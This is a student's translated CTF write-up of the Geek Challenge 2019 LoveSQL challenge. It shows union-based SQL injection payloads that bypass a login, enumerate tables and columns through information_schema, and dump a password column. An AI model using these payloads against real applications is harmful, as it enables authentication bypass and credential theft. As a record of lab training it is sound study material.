CTF study notes - LoveSQL

1. [Geek Challenge 2019] LoveSQL

1. Topic

2. Problem solving steps

The title prompts sqlmap, let’s try the old rules.

Continue to use other sql statements to try, first try the omnipotent, and the 1' or 1=1 #result is successful... A wonderful code burst out, but it’s not a flag when I tried it. Next, try the query

try union query1' union select 1#

Change the posture (here is purely ignorant, I didn't expect it)


Hmm? The one here passed directly, and then echoed 2 and 3, which should be the field burst, and then look at how many fields there are in total

. , it can be seen that there are a total of four fields. Then check the library name and 1' union select 1,database(),3#

see that the library name is geek. Continue to query 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='geek',3#
(this payload is copied by the master, the function of the group_concat() function is: connect the values ​​in the same group generated by group by and return a string result. information_schema is understood as the information of the database, and information_schema. The meaning of tables where table_schema='geek' is to query the information of the geek library in the database.)

This error is blinded... Continue to look at wp, here we have been prompted to query in 3 positions. 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

It can be seen that there are two tables, continue to query 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek'#

here id , username , password It should be the field.
The library, table, and fields are all clear. Here, the master blindly guessed the password in the l0velysql table... This may be the intuition of the big guy.
structure1' union select 1,2,group_concat(password) from l0ve1ysq1 #

3. Summary

1. This is the first time to do joint query questions, but basically I follow the master's wp to do it, and learn how to construct the payload of joint query.
2. sqlmap has also tested the joint query, but it is not clear why no error is reported.
3. There are too many sql statements, so we need to sort out a sql vulnerability collection and function library later.
4. I didn't understand the last 2 and 3 in the joint query. The master said it was the injection point. I thought it was the field name at first, but it was not.

4. References

• Buuctf geek challenge lovesql_SopRomeo's blog - CSDN blog
• Description of the information_schema.tables field in mysql
• Introduction to information_schema in MYSQL - Programmer Sought
• MySQL tutorial concat and usage of group_concat